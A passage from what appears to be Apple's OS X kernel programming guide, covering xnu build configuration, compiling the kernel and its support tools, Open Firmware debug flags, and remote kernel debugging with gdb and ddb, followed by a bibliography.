and so on, for each new file associated with that module. This also applies if you are adding a file to an existing module. If you are adding a file that is not associated with any module at all, you add a line that looks like the following to specify that this file should always be included:

    osfmk/crud/mandatory_file.c    standard

If you are not adding any modules, then you’re done.
Otherwise, you also need to enable your option in one of the MASTER files.

Enabling Module Options

To enable a module option (as described in the files files), you must add an entry for that option into one of the MASTER files. If your code is not a BSD pseudo-device, you should add something like the following:

    options MACH_FOO

Otherwise, you should add something like this:

    pseudo-device mach_foo

In the case of a pseudo-device (for example, /dev/random), you can also add a number. When your code checks to see if it should be included, it can also check that number and allocate resources for more than one pseudo-device. The meaning of multiple pseudo-devices is device-dependent. An example of this is ppp, which allocates resources for two simultaneous PPP connections. Thus, in the MASTER.ppc file, it has the line:

    pseudo-device ppp 2

Modifying the Source Code Files

In the OS X kernel, all source code files are automatically compiled. It is the responsibility of the C file itself to determine whether its contents need to be included in the build or not.

In the example above, you created a module called mach_foo. Assume that you want this file to compile only on PowerPC-based computers. In that case, you should have included the option only in MASTER.ppc and not in MASTER.i386. However, by default, merely specifying the file foo_main.c in files causes it to be compiled, regardless of compile options specified.

To make the code compile only when the option mach_foo is included in the configuration, you should begin each C source file with the lines

    #include
    #if (MACH_FOO > 0)

and end it with

    #endif /* MACH_FOO */

If mach_foo is a pseudo-device and you need to check the number of mach_foo pseudo-devices included, you can do further tests of the value of MACH_FOO.

Note that the file is not something you create. It is created by the makefiles themselves.
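
As a rough illustration of testing the value of MACH_FOO, the sketch below sizes a table by the configured pseudo-device count. It is a user-space approximation under stated assumptions: the fallback #define stands in for the generated header (in a real build the value comes from the configuration, not from the source file), and the names foo_softc, foo_devices, foo_init, and foo_claim are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/*
 * Assumption: in a real kernel build, MACH_FOO is supplied by the header
 * that the makefiles generate for the option. This fallback only lets the
 * sketch compile on its own; 2 mimics "pseudo-device mach_foo 2".
 */
#ifndef MACH_FOO
#define MACH_FOO 2
#endif

#if (MACH_FOO > 0)

/* Hypothetical per-device state, one slot per configured pseudo-device. */
struct foo_softc {
    int unit;
    int in_use;
};

static struct foo_softc foo_devices[MACH_FOO];

/* Initializes every configured unit and returns how many were set up. */
static int foo_init(void)
{
    int i;

    for (i = 0; i < MACH_FOO; i++) {
        foo_devices[i].unit = i;
        foo_devices[i].in_use = 0;
    }
    return MACH_FOO;
}

/* Marks a unit as in use; returns NULL if it is already claimed. */
static struct foo_softc *foo_claim(int unit)
{
    assert(unit >= 0 && unit < MACH_FOO);   /* caller must pass a valid unit */
    if (foo_devices[unit].in_use)
        return NULL;
    foo_devices[unit].in_use = 1;
    return &foo_devices[unit];
}

#endif /* MACH_FOO */
```

With the option disabled (MACH_FOO defined as 0), everything between #if and #endif drops out of the build, which is the behavior the guard lines are meant to provide.
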
You must run make exporthdrs before make all to generate these header files.

Building Your First Kernel

Before you can build a kernel, you must first obtain source code. Source code for the OS X kernel can be found in the Darwin xnu project on http://www.opensource.apple.com. To find out your current kernel version, use the command uname -a. If you run into trouble, search the archives of the darwin-kernel and darwin-development mailing lists for information. If that doesn’t help, ask for assistance on either list. The list archives and subscription information can be found at http://www.lists.apple.com.

Note: Before you begin, make sure you extract the sources in a directory whose path does not contain any “special” characters (non-alphanumeric characters other than dash and underscore), as having such characters in the path leading up to the build directory can cause compiling to fail.

Also, make sure that /usr/local/bin is in your PATH environment variable as follows:

If you are using a csh derivative such as tcsh, you should add

    set path = (/usr/local/bin $path)

to your .tcshrc file.

If you are using a Bourne shell derivative, you should add

    export PATH=/usr/local/bin:$PATH

to your .bashrc file.

Important: Once you have obtained and extracted the sources, before you begin compiling kernel support tools, you should configure your system to build using gcc 3.3. The OS X v10.4 kernel will not build using gcc 4.0. To do this, type:

    sudo gcc_select 3.3

Important: Before building anything, you should make sure you are running the latest version of OS X with the latest developer tools. The xnu compile process may reference various external headers from /System/Library/Frameworks. These headers are only installed as part of a developer tools installation, not as part of the normal OS X install process.

Next, you will need to compile several support tools.
Get the bootstrap_cmds, Libstreams, kext_tools, IOKitUser, and cctools packages from http://www.opensource.apple.com. Extract the files from these .tar packages, then do the following:

    sudo mkdir -p /usr/local/bin
    sudo mkdir -p /usr/local/lib
    cd bootstrap_cmds-version/relpath.tproj
    make
    sudo make install
    cd ../../Libstreams-version
    make
    sudo make install
    cd ../cctools-version
    sudo cp /usr/include/ar.h \
        /System/Library/Frameworks/Kernel.framework/Headers

In the cctools package, modify the Makefile, and change the COMMON_SUBDIRS line (including the continuation line after it) to read:

    COMMON_SUBDIRS = libstuff libmacho misc

Finally, issue the following commands:

    make RC_OS=macos
    sudo cp misc/seg_hack.NEW /usr/local/bin/seg_hack
    cd ld
    make RC_OS=macos kld_build
    sudo cp static_kld/libkld.a /usr/local/lib
    sudo ranlib /usr/local/lib/libkld.a

Now you’re done with the cctools project. One final step remains: compiling kextsymboltool. To do this, extract the kext_tools tarball, then do the following:

    sudo mkdir -p /System/Library/Frameworks/IOKit.framework/Versions/A/PrivateHeaders/kext
    cd /System/Library/Frameworks/IOKit.framework/
    sudo ln -s Versions/A/PrivateHeaders PrivateHeaders
    sudo cp PATH_TO_IOKITUSER/IOKitUser-version/kext.subproj/*.h PrivateHeaders/kext
    cd PATH_TO_KEXT_TOOLS/kext_tools-version
    gcc kextsymboltool.c -o kextsymboltool
    sudo cp kextsymboltool /usr/local/bin

Warning: If you do not use a version of kextsymboltool that is at least as current as your kernel, you will get serious compile failures. If you see the error message “exported name not in import list”, there’s a good chance you aren’t using a current kextsymboltool.

Congratulations. You now have all the necessary tools, libraries, and header files to build a kernel.
The next step is to compile the kernel itself.

First, change directories into the xnu directory. Next, you need to set a few environment variables appropriately. For your convenience, the kernel sources contain shell scripts to do this for you. If you are using sh, bash, zsh, or some other Bourne-compatible shell, issue the following command:

    source SETUP/setup.sh

If you are using csh, tcsh, or a similar shell, use the following command:

    source SETUP/setup.csh

Then, you should be able to type

    make exporthdrs
    make all

and get a working kernel in BUILD/obj/RELEASE_PPC/mach_kernel (assuming you are building a RELEASE kernel for PowerPC, of course).

If things don’t work, the darwin-kernel mailing list is a good place to get help.

Building an Alternate Kernel Configuration

When building a kernel, you may want to build a configuration other than the RELEASE configuration (the default shipping configuration). Additional configurations are RELEASE_TRACE, DEBUG, DEBUG_TRACE, and PROFILE. These configurations add various additional options (except PROFILE, which is reserved for future expansion, and currently maps onto RELEASE).

The most useful and interesting configurations are RELEASE and DEBUG. The RELEASE configuration should be the same as a stock Apple-released kernel, so it is interesting only if you are building source that differs from that which was used to build the kernel you are already running. Compiling a kernel without specifying a configuration results in the RELEASE configuration being built.

The DEBUG configuration enables ddb, the in-kernel serial debugger. The ddb debugger is helpful for debugging panics that occur early in boot or within certain parts of the Ethernet driver. It is also useful for debugging low-level interrupt handler routines that cannot be debugged by using the more traditional gdb.

To compile an alternate kernel configuration, you should follow the same basic procedure as outlined previously, changing the final make statement slightly. For example, to build the DEBUG configuration, instead of typing

    make all

you type

    make KERNEL_CONFIGS=DEBUG all

and wait.

To turn on additional compile options, you must modify one of the MASTER files. For information on modifying these files, see the section “Enabling Module Options” (page 156).

When Things Go Wrong: Debugging the Kernel

No matter how careful your programming habits, sometimes things don’t work right the first time. Kernel panics are simply a fact of life during development of kernel extensions or other in-kernel code.

There are a number of ways to track down problems in kernel code. In many cases, you can find the problem through careful use of printf or IOLog statements. Some people swear by this method, and indeed, given sufficient time and effort, any bug can be found and fixed without using a debugger.

Of course, the key words in that statement are “given sufficient time and effort.” For the rest of us, there are debuggers: gdb and ddb.

Setting Debug Flags in Open Firmware

With the exception of kernel panics or calls to PE_enter_debugger, it is not possible to do remote kernel debugging without setting debug flags in Open Firmware. These flags are relevant to both gdb and ddb debugging and are important enough to warrant their own section.

To set these flags, you can either use the nvram program (from the OS X command line) or access your computer’s Open Firmware. You can access Open Firmware by holding down Command-Option-O-F at boot time. For most computers, the default is for Open Firmware to present a command-line prompt on your monitor and accept input from your keyboard. For some older computers you must use a serial line at 38400, 8N1.
(Technically, such computers are not supported by OS X, but some are usable under Darwin, and thus they are mentioned here for completeness.)

From an Open Firmware prompt, you can set the flags with the setenv command. From the OS X command line, you would use the nvram command. Note that when modifying these flags you should always look at the old value for the appropriate Open Firmware variables and add the debug flags.

For example, if you want to set the debug flags to 0x4, you use one of the following commands. For computers with recent versions of Open Firmware, you would type

    printenv boot-args
    setenv boot-args original_contents debug=0x4

from Open Firmware or

    nvram boot-args
    nvram boot-args="original_contents debug=0x4"

from the command line (as root).

For older firmware versions, the interesting variable is boot-command. Thus, you might do something like

    printenv boot-command
    setenv boot-command 0 bootr debug=0x4

from Open Firmware or

    nvram boot-command
    nvram boot-command="0 bootr debug=0x4"

from the command line (as root).

Of course, the more important issue is what value to choose for the debug flags. Table 20-1 (page 163) lists the debugging flags that are supported in OS X.

Table 20-1 Debugging flags

    Symbolic name    Flag    Meaning
    DB_HALT          0x01    Halt at boot-time and wait for debugger attach (gdb).
    DB_PRT           0x02    Send kernel debugging printf output to console.
    DB_NMI           0x04    Drop into debugger on NMI (Command-Power, Command-Option-Control-Shift-Escape, or interrupt switch).
    DB_KPRT          0x08    Send kernel debugging kprintf output to serial port.
    DB_KDB           0x10    Make ddb (kdb) the default debugger (requires a custom kernel).
    DB_SLOG          0x20    Output certain diagnostic info to the system log.
    DB_ARP           0x40    Allow debugger to ARP and route (allows debugging across routers and removes the need for a permanent ARP entry, but is a potential security hole); not available in all kernels.
    DB_KDP_BP_DIS    0x80    Support old versions of gdb on newer systems.
    DB_LOG_PI_SCRN   0x100   Disable graphical panic dialog.

The option DB_KDP_BP_DIS is not available on all systems, and should not be important if your target and host systems are running the same or similar versions of OS X with matching developer tools. The last option is only available in OS X v10.2 and later.

Avoiding Watchdog Timer Problems

Macintosh computers have various watchdog timers designed to protect the system from certain types of failures. There are two primary watchdog timers in common use: the power management watchdog timer (not present on all systems) and the system crash watchdog timer. Both watchdogs are part of the power management hardware.

The first of these, the power management watchdog timer, is designed to restore the system to a known safe state in the event of unexpected communication loss between the power management hardware and the CPU. This timer is only present in G4 and earlier desktops and laptops and in early G5 desktops. More specifically, it is present only in machines containing a PMU (Power Management Unit) chip.

Under normal circumstances, when communication with the PMU chip is lost, the PMU driver will attempt to get back in sync with the PMU chip. With the possible exception of a momentary loss of keyboard and mouse control, you probably won't notice that anything has happened (and you should never even experience such a stall unless you are writing a device driver that disables interrupts for an extended period of time).
The problem occurs when the disruption in communication is caused by entering the debugger while the PMU chip is in one of its "unsafe" states. If the chip is left in such a state for too long, it will shut the computer down to prevent overheating or other problems.

This problem can be significantly reduced by operating the PMU chip in polled mode, which prevents the watchdog timer from activating. You should only use this option when debugging, however, as it diminishes performance and a crashed system could overheat.

To disable this watchdog timer, add the argument pmuflags=1 to the kernel's boot arguments. See “Setting Debug Flags in Open Firmware” (page 161) for information about how to add a boot argument.

The second type of watchdog timer is the system crash watchdog timer. This is normally only enabled in OS X Server. If your target machine is running OS X Server, your system will automatically reboot within seconds after a crash to maximize server uptime. You can disable this automatic reboot-on-crash feature in the server administration tool.

Choosing a Debugger

There are two basic debugging environments supported by OS X: ddb and gdb. ddb is a built-in debugger that works over a serial line. By contrast, gdb is supported using a debugging shim built into the kernel, which allows a remote computer on the same physical network to attach after a panic (or sooner if you pass certain options to the kernel).

For problems involving network extensions or low-level operating system bringups, ddb is the only way to do debugging. For other bugs, gdb is generally easier to use. For completeness, this chapter describes how to use both ddb and gdb to do basic debugging. Since gdb itself is well documented and is commonly used for application programming, this chapter assumes at least a passing knowledge of the basics of using gdb and focuses on the areas where remote (kernel) gdb differs.

Note: Only systems with serial hardware support ddb. Thus, it is only possible to use ddb on PowerMac G4 and older systems.

Using gdb for Kernel Debugging

gdb, short for the GNU Debugger, is a piece of software commonly used for debugging software on UNIX and Linux systems. This section assumes that you have used gdb before, and does not attempt to explain basic usage.

In standard OS X builds (and in your builds unless you compile with ddb support), gdb support is built into the system but is turned off except in the case of a kernel panic.

Of course, many software failures in the kernel do not result in a kernel panic but still cause aberrant behavior. For this reason, you can pass additional flags to the kernel to allow you to attach to a remote computer early in boot or after a nonmaskable interrupt (NMI), or you can programmatically drop into the debugger in your code.

You can cause the test computer (the debug target) to drop into the debugger in the following ways:

● debug on panic
● debug on NMI
● debug on boot
● programmatically drop into the default debugger

The function PE_enter_debugger can be called from anywhere in the kernel, although if gdb is your default debugger, a crash will result if the network hardware is not initialized or if gdb cannot be used in that particular context. This call is described in the header pexpert/pexpert.h.

After you have decided what method to use for dropping into the debugger on the target, you must configure your debug host (the computer that will actually be running gdb). Your debug host should be running a version of OS X that is comparable to the version running on your target host. However, it should not be running a customized kernel, since a debug host crash would be problematic, to say the least.

Note: It is possible to use a non-OS X system as your debug host.
This is not a trivial exercise, however, and a description of building a cross-gdb is beyond the scope of this document.

When using gdb, the best results can be obtained when the source code for the customized kernel is present on your debug host. This not only makes debugging easier by allowing you to see the lines of code when you stop execution, it also makes it easier to modify those lines of code. Thus, the ideal situation is for your debug host to also be your build computer. This is not required, but it makes things easier. If you are debugging a kernel extension, it generally suffices to have the source for the kernel extension itself on your debug host. However, if you need to see kernel-specific structures, having the kernel sources on your debug host may also be helpful.

Once you have built a kernel using your debug host, you must then copy it to your target computer and reboot the target computer. At this point, if you are doing panic-only debugging, you should trigger the panic. Otherwise, you should tell your target computer to drop into the debugger by issuing an NMI (or by merely booting, in the case of debug=0x1).

Next, unless your kernel supports ARP while debugging (and unless you enabled it with the appropriate debug flag), you need to add a permanent ARP entry for the target, because the target is unable to answer ARP requests while waiting for the debugger. The permanent entry ensures that your connection won’t suddenly disappear. The following example assumes that your target is target.foo.com with an IP address of 10.0.0.69:

    $ ping -c 1 target_host_name
    ping results: ....
    $ arp -an
    target.foo.com (10.0.0.69): 00:a0:13:12:65:31
    $ sudo arp -s target.foo.com 00:a0:13:12:65:31
    $ arp -an
    target.foo.com (10.0.0.69) at 00:a0:13:12:65:31 permanent

Now, you can begin debugging by doing the following:

    gdb /path/to/mach_kernel
    source /path/to/xnu/osfmk/.gdbinit
    p proc0
    source /path/to/xnu/osfmk/.gdbinit
    target remote-kdp
    attach 10.0.0.69

Note that the mach kernel passed as an argument to gdb should be the symbol-laden kernel file located in BUILD/obj/DEBUG_PPC/mach_kernel.sys (for debug kernel builds; RELEASE_PPC for non-debug builds), not the bootable kernel that you copied onto the debug target. Otherwise most of the gdb macros will fail. The correct kernel should be several times as large as a normal kernel.

You must issue the p proc0 command and source the .gdbinit file (from the appropriate kernel sources) twice, as shown, to work around a bug in gdb. Of course, if you do not need any of the macros in .gdbinit, you can skip those two instructions. The macros are mostly of interest to people debugging aspects of Mach, though they also provide ways of obtaining information about currently loaded KEXTs.

Warning: It may not be possible to detach in a way that the target computer’s kernel continues to run. If you detach, the target hangs until you reattach. It is not always possible to reattach, though the situation is improving in this area. Do not detach from the remote kernel!

If you are debugging a kernel module, you need to do some additional work to get debugging symbol information about the module. First, you need to know the load address for the module. You can get this information by running kextstat (kmodstat on systems running OS X v10.1 or earlier) as root on the target.
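If you have captured the kextstat output as text, the load address can be picked out mechanically on the debug host. The following is a minimal Python sketch, not part of the original procedure. It assumes the usual kextstat column layout (index, reference count, load address, size, wired size, bundle name); the sample text, the bundle identifier com.example.driver.mykext, and the function name find_load_address are all hypothetical and exist only for illustration.

```python
def find_load_address(kextstat_output, bundle_id):
    """Return the load address (as an int) of bundle_id, or None if absent.

    Assumed row layout (an assumption, check it against your own output):
      Index Refs Address Size Wired Name (Version) <Linked Against>
    """
    for line in kextstat_output.splitlines():
        fields = line.split()
        # Skip the header row and anything too short to be a data row.
        if len(fields) < 6 or not fields[0].isdigit():
            continue
        address, name = fields[2], fields[5]
        if name == bundle_id:
            return int(address, 16)
    return None


# Hypothetical sample output; real addresses and names will differ.
SAMPLE = """\
Index Refs Address    Size       Wired      Name (Version) <Linked Against>
    1    1 0x0        0x0        0x0        com.apple.kernel (8.0.0)
   92    0 0xf7a4000  0x3000     0x2000     com.example.driver.mykext (1.0) <11 6 5>
"""

addr = find_load_address(SAMPLE, "com.example.driver.mykext")
print(hex(addr))  # prints 0xf7a4000
```

The address found this way is the value used when generating a symbol file for the module.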
If you are already in the debugger, then assuming the target did not panic, you should be able to use the continue function in gdb to revive the target, get this information, then trigger another NMI to drop back into the debugger.

If the target is no longer functional, and if you have a fully symbol-laden kernel file on your debug host that matches the kernel on your debug target, you can use the showallkmods macro to obtain this information. Obtaining a fully symbol-laden kernel generally requires compiling the kernel yourself.

Once you have the load address of the module in question, you need to create a symbol file for the module. You do this in different ways on different versions of OS X.

For versions 10.1 and earlier, you use the kmodsyms program to create a symbol file for the module. If your KEXT is called mykext and it is loaded at address 0xf7a4000, for example, you change directories to mykext.kext/Contents/MacOS and type:

    kmodsyms -k path/to/mach_kernel -o mykext.sym mykext@0xf7a4000

Be sure to specify the correct path for the mach kernel that is running on your target (assuming it is not the same as the kernel running on your debug host).

For versions after 10.1, you have two options. If your KEXT does not crash the computer when it loads, you can ask kextload to generate the symbols at load time by passing it the following options:

    kextload -s symboldir mykext.kext

It will then write the symbols for your kernel extension and its dependencies into files within the directory you specified. Of course, this only works if your target doesn’t crash at or shortly after load time.

Alternatively, if you are debugging an existing panic, or if your KEXT can’t be loaded without causing a panic, you can generate the debugging symbols on your debug host. You do this by typing:

    kextload -n -s symboldir mykext.kext

It will then prompt you for the load address of the kernel extension and the addresses of all its dependencies. As mentioned previously, you can find the addresses with kextstat (or kmodstat) or by typing showallkmods inside gdb.

You should now have a file or files containing symbolic information that gdb can use to determine address-to-name mappings within the KEXT. To add the symbols from that KEXT, within gdb on your debug host, type the command

    add-symbol-file mykext.sym

for each symbol file. You should now be able to see a human-readable representation of the addresses of functions, variables, and so on.

Special gdb I/O Addressing Issues

As described in “Address Spaces” (page 70), some Macintosh hardware has a third addressing mode called I/O addressing, which differs from both physical and virtual addressing modes. Most developers will not need to know about these modes in any detail.

Developers are most likely to run into problems when debugging PCI device drivers and attempting to access device memory or registers.

To allow I/O-mapped memory dumping, do the following:

    set kdp_read_io=1

To dump in physical mode, do the following:

    set kdp_trans_off=1

For example:

    (gdb) x/x 0xf8022034
    0xf8022034: Cannot access memory at address 0xf8022034
    (gdb) set kdp_trans_off=1
    (gdb) x/x 0xf8022034
    0xf8022034: Cannot access memory at address 0xf8022034
    (gdb) set kdp_read_io=1
    (gdb) x/x 0xf8022034
    0xf8022034: 0x00000020
    (gdb)

If you experience problems accessing I/O addresses that are not corrected by this procedure, please contact Apple Developer Technical Support for additional assistance.

Using ddb for Kernel Debugging

When doing typical debugging, gdb is probably the best solution. However, there are times when gdb cannot be used or where gdb can easily run into problems.
Some of these include

● drivers for built-in Ethernet hardware
● interrupt handlers (the hardware variety, not handler threads)
● early bootstrap before the network hardware is initialized

When gdb is not practical (or if you’re curious), there is a second debug mechanism that can be compiled into OS X. This mechanism is called ddb, and is similar to the kdb debugger in most BSD UNIX systems. It is not quite as easy to use as gdb, mainly because of the hardware needed to use it.

Unlike gdb (which uses Ethernet for communication with a kernel stub), ddb is built into the kernel itself, and interacts directly with the user over a serial line. Also unlike gdb, using ddb requires building a custom kernel using the DEBUG configuration. For more information on building this kernel, see “Building Your First Kernel” (page 158).

Note: ddb requires an actual built-in hardware serial line on the debug target. Neither PCI nor USB serial adapters will work. In order to work reliably for interrupt-level debugging, ddb controls the serial ports directly with a polled-mode driver without the use of the I/O Kit.

If your debug target does not have a factory serial port, third-party adapter boards may be available that replace your internal modem with a serial port. Since these devices use the built-in serial controller, they should work for ddb. It is not necessary to install OS X drivers for these devices if you are using them only to support ddb debugging.

The use of these serial port adapter cards is not an officially supported configuration, and not all computers support the third-party adapter boards needed for ddb support. Consult the appropriate adapter board vendor for compatibility information.

If your target computer has two serial ports, ddb uses the modem port (SCC port 0). However, if your target has only one serial port, that port is probably attached to port 1 of the SCC cell, which means that you have to change the default port if you want to use ddb. To use this port (SCC port 1), change the line:

    const int console_unit=0;

in osfmk/ppc/serial_console.c to read:

    const int console_unit=1;

and recompile the kernel.

Once you have a kernel with ddb support, it is relatively easy to use. First, you need to set up a terminal emulator program on your debug host. If your debug host is running Mac OS 9, you might use ZTerm, for example. For OS X computers, or for computers running Linux or UNIX, minicom provides a good environment. Setting up these programs is beyond the scope of this document.

Important: Serial port settings for communicating with ddb must be 57600 8N1. Hardware handshaking may be on, but is not necessary.

Note: For targets whose Open Firmware uses the serial ports, remember that the baud rate for communicating with Open Firmware is 38400 and that hardware handshaking must be off.

Once you boot a kernel with ddb support, a panic will allow you to drop into the debugger, as will a call to PE_enter_debugger. If the DB_KDB flag is not set, you will have to press the D key on the keyboard to use ddb. Alternatively, if both DB_KDB and DB_NMI are set, you should be able to drop into ddb by generating a nonmaskable interrupt (NMI). See “Setting Debug Flags in Open Firmware” (page 161) for more information on debug flags.

To generate a nonmaskable interrupt, do one of the following:

● hold down the Command, Option, Control, and Shift keys and press Escape (OS X v10.4 and newer)
● hold down the Command key while pressing the power key on your keyboard (on hardware with a power key)
● press the interrupt button on your target computer

At this point, the system should hang, and you should see ddb output on the serial terminal. If you do not, check your configuration and verify that you have specified the correct serial port on both computers.
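Because each debug flag occupies its own bit, having "both DB_KDB and DB_NMI set" means passing the bitwise OR of their values in the debug= boot argument. The following Python sketch shows the arithmetic, using the values listed in Table 20-1 (page 163). The helper names combine_flags and describe_flags are made up for illustration and are not part of any Apple tool.

```python
# Flag values copied from Table 20-1.
DEBUG_FLAGS = {
    "DB_HALT": 0x01,
    "DB_PRT": 0x02,
    "DB_NMI": 0x04,
    "DB_KPRT": 0x08,
    "DB_KDB": 0x10,
    "DB_SLOG": 0x20,
    "DB_ARP": 0x40,
    "DB_KDP_BP_DIS": 0x80,
    "DB_LOG_PI_SCRN": 0x100,
}


def combine_flags(*names):
    """OR together the named flags and return the numeric value."""
    value = 0
    for name in names:
        value |= DEBUG_FLAGS[name]
    return value


def describe_flags(value):
    """Return the names of the flags set in value, lowest bit first."""
    return [name for name, bit in DEBUG_FLAGS.items() if value & bit]


value = combine_flags("DB_KDB", "DB_NMI")
print("debug=0x%x" % value)   # prints debug=0x14
print(describe_flags(0x44))   # prints ['DB_NMI', 'DB_ARP']
```

The resulting debug=0x14 string is what you would add to the existing contents of boot-args, as described in “Setting Debug Flags in Open Firmware” (page 161).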
Commands and Syntax of ddb

The ddb debugger is much more gdb-like than previous versions, but it still has a syntax that is very much its own (shared only with other ddb and kdb debuggers). Because ddb is substantially different from what most developers are used to using, this section outlines the basic commands and syntax.

The commands in ddb are generally in this form:

    command[/switch] address[,count]

The switches can be one of those shown in Table 20-2 (page 171).

Table 20-2 Switch options in ddb

Switch    Description
/A        Print the location with line number if possible
/I        Display as instruction with possible alternate machine-dependent format
/a        Print the location being displayed
/b        Display or process by bytes
/c        Display low 8 bits as a character (nonprinting characters as octal) or count instructions while executing (depending on command)
/d        Display as signed decimal
/h        Display or process by half word (16 bits)
/i        Display as an instruction
/l        Display or process by long word (32 bits)
/m        Display as unsigned hex with character dump for each line
/o        Display in unsigned octal
/p        Print cumulative instruction count and call tree depth at each call or return statement
/r        Display in current radix, signed
/s        Display the null-terminated string at address (nonprinting as octal)
/u        Display in unsigned decimal or set breakpoint at a user space address (depending on command)
/x        Display in unsigned hex
/z        Display in signed hex

The ddb debugger has a rich command set that has grown over its lifetime. Its command set is similar to that of ddb and kdb on other BSD systems, and their manual pages provide a fairly good reference for the various commands. The command set for ddb includes the following commands:
break[/u] addr
    Set a breakpoint at the address specified by addr. Execution will stop when the breakpoint is reached. The /u switch means to set a breakpoint in user space.

c or continue[/c]
    Continue execution after reaching a breakpoint. The /c switch means to count instructions while executing.

call
    Call a function.

cond
    Set condition breakpoints. This command is not supported on PowerPC.

cpu cpunum
    Causes ddb to switch to run on a different CPU.

d or delete [addr|#]
    Delete a breakpoint. This takes a single argument that can be either an address or a breakpoint number.

dk
    Equivalent to running kextstat while the target computer is running. This lists loaded KEXTs, their load addresses, and various related information.

dl vaddr
    Dumps a range of memory starting from the address given. The parameter vaddr is a kernel virtual address. If vaddr is not specified, the last accessed address is used. See also dr, dv.

dm
    Displays mapping information for the last address accessed.

dmacro name
    Delete the macro called name. See macro.

dp
    Displays the currently active page table.

dr addr
    Dumps a range of memory starting from the address given. The parameter addr is a physical address. If addr is not specified, the last accessed address is used. See also dl, dv.

ds
    Dumps save areas of all Mach tasks.

dv [addr [vsid]]
    Dumps a range of memory starting from the address given. The parameter addr is a virtual address in the address space indicated by vsid. If addr is not specified, the last accessed address is used. Similarly, if vsid is not specified, the last vsid is used. See also dl, dr.

dwatch addr
    Delete a watchpoint. See watch.

dx
    Displays CPU registers.

examine
    See print.

gdb
    Switches to gdb mode, allowing gdb to attach to the computer.

lt
    On PowerPC only: Dumps the PowerPC exception trace table.

macro name command [ ; command .. ]
    Create a macro called name that executes the listed commands. You can show a macro with the command show macro name or delete it with dmacro name.

match[/p]
    Stop at the matching return instruction. If the /p switch is not specified, summary information is printed only at the final return.

print[/AIabcdhilmorsuxz] addr1 [addr2 ...]
    Print the values at the addresses given in the format specified by the switch. If no switch is given, the last used switch is assumed. Synonymous with examine and x. Note that some of the listed switches may work for examine and not for print.

reboot
    Reboots the computer immediately, without doing any file-system unmounts or other cleanup. Do not do this except after a panic.

s or step
    Single step through instructions.

search[/bhl] addr value [mask[,count]]
    Search memory for value starting at addr. If the value is not found, this command can wreak havoc. This command may take other formatting values in addition to those listed.

set $name [=] expr
    Sets the value of the variable or register named by name to the value indicated by expr.

show
    Display system data. For a list of information that can be shown, type the show command by itself. Additional suboptions are available for certain options, particularly show all. To list those suboptions, type show all by itself.

trace[/u]
    Prints a stack backtrace. If the /u flag is specified, the stack trace extends to user space if supported by architecture-dependent code.

until[/p]
    Stop at the next call or return.

w or write[/bhl] addr expr1 [expr2 ... ]
    Writes the value of expr1 to the memory location stored at addr in increments of a byte, half word, or long word. If additional expressions are specified, they are written to consecutive bytes, half words, or long words.

watch addr[,size]
    Sets a watchpoint on a particular address. Execution stops when the value stored at that address is modified. Watchpoints are not supported on PowerPC.
    Warning: Watching addresses in wired kernel memory may cause unrecoverable errors on i386.

x
    Short for examine. See print.

xb
    Examine backward. Execute the last examine command, but use the address previous to the last one used (jumping backward by increments of the last width displayed).

xf
    Examine forward. Execute the last examine command, but use the address following the last one used (jumping by increments of the last width displayed).

The ddb debugger should seem relatively familiar to users of gdb, and its syntax was changed radically from its predecessor, kdb, to be more gdb-like. However, it is still sufficiently different that you should take some time to familiarize yourself with its use before attempting to debug something with it. It is far easier to use ddb on a system whose memory hasn’t been scribbled upon by an errant DMA request, for example.

Bibliography

This bibliography contains related material that may be of interest. The editions listed are the editions that were current when this list was compiled, but newer versions may be available.

Apple OS X Publications

The following Apple publications have information that could be of interest to you if you are programming in the kernel:

Hello Debugger: Debugging a Device Driver With GDB (tutorial).
Hello I/O Kit: Creating a Device Driver With Xcode (tutorial).
Hello Kernel: Creating a Kernel Extension With Xcode (tutorial).
Accessing Hardware From Applications
I/O Kit Fundamentals
Network Kernel Extensions Programming Guide
Network Kernel Extensions (legacy)
Mac Technology Overview
Porting UNIX/Linux Applications to OS X
I/O Kit Device Driver Design Guidelines
Packaging Your KEXT for Distribution and Installation (tutorial).
General UNIX and Open Source Resources

A Quarter Century of UNIX. Peter H. Salus. Addison-Wesley, 1994. ISBN 0-201-54777-5.
Berkeley Software Distribution. CSRG, UC Berkeley. USENIX and O’Reilly, 1994. ISBN 1-56592-082-1.
The Cathedral and the Bazaar: Musings on Linux and Open Source by an Accidental Revolutionary. Eric S. Raymond. O’Reilly & Associates, 1999. ISBN 1-56592-724-9.
The New Hacker’s Dictionary. 3rd Ed. Eric S. Raymond. MIT Press, 1996. ISBN 0-262-68092-0.
Open Sources: Voices from the Open Source Revolution. Edited by Chris DiBona, Sam Ockman & Mark Stone. O’Reilly & Associates, 1999. ISBN 1-56592-582-3.
Proceedings of the First Conference on Freely Redistributable Software. Free Software Foundation. FSF, 1996. ISBN 1-882114-47-7.
The UNIX Desk Reference: The hu.man Pages. Peter Dyson. Sybex, 1996. ISBN 0-7821-1658-2.
The UNIX Programming Environment. Brian W. Kernighan, Rob Pike. Prentice Hall, 1984. ISBN 0-13-937681-X (paperback), ISBN 0-13-937699-2 (hardback).

BSD and UNIX Internals

Advanced Topics in UNIX: Processes, Files, and Systems. Ronald J. Leach. Wiley, 1996. ISBN 1-57176-159-4.
The Complete FreeBSD. Greg Lehey. Walnut Creek CDROM Books, 1999. ISBN 1-57176-246-9.
The Design and Implementation of the 4.4BSD Operating System. Marshall Kirk McKusick, et al. Addison-Wesley, 1996. ISBN 0-201-54979-4.
The Design of the UNIX Operating System. Maurice J. Bach. Prentice Hall, 1986. ISBN 0-13-201799-7.
Linux Kernel Internals, 2nd edition. Michael Beck, et al. Addison-Wesley, 1997. ISBN 0-201-33143-8.
Lions’ Commentary on UNIX 6th Edition with Source Code. John Lions. Peer-to-Peer, 1996. ISBN 1-57398-013-7.
Panic!: UNIX System Crash Dump Analysis. Chris Drake, Kimberly Brown. Prentice Hall, 1995. ISBN 0-13-149386-8.
UNIX Internals: The New Frontiers. Uresh Vahalia. Prentice-Hall, 1995. ISBN 0-13-101908-2.
UNIX Systems for Modern Architectures: Symmetric Multiprocessing and Caching for Kernel Programmers. Curt Schimmel. Addison-Wesley, 1994. ISBN 0-201-63338-8.
Optimizing PowerPC Code. Gary Kacmarcik. Addison-Wesley Publishing Company, 1995. ISBN 0-201-40839-2.
Berkeley Software Architecture Manual 4.4BSD Edition. William Joy, Robert Fabry, Samuel Leffler, M. Kirk McKusick, Michael Karels. Computer Systems Research Group, Computer Science Division, Department of Electrical Engineering and Computer Science, University of California, Berkeley.

Mach

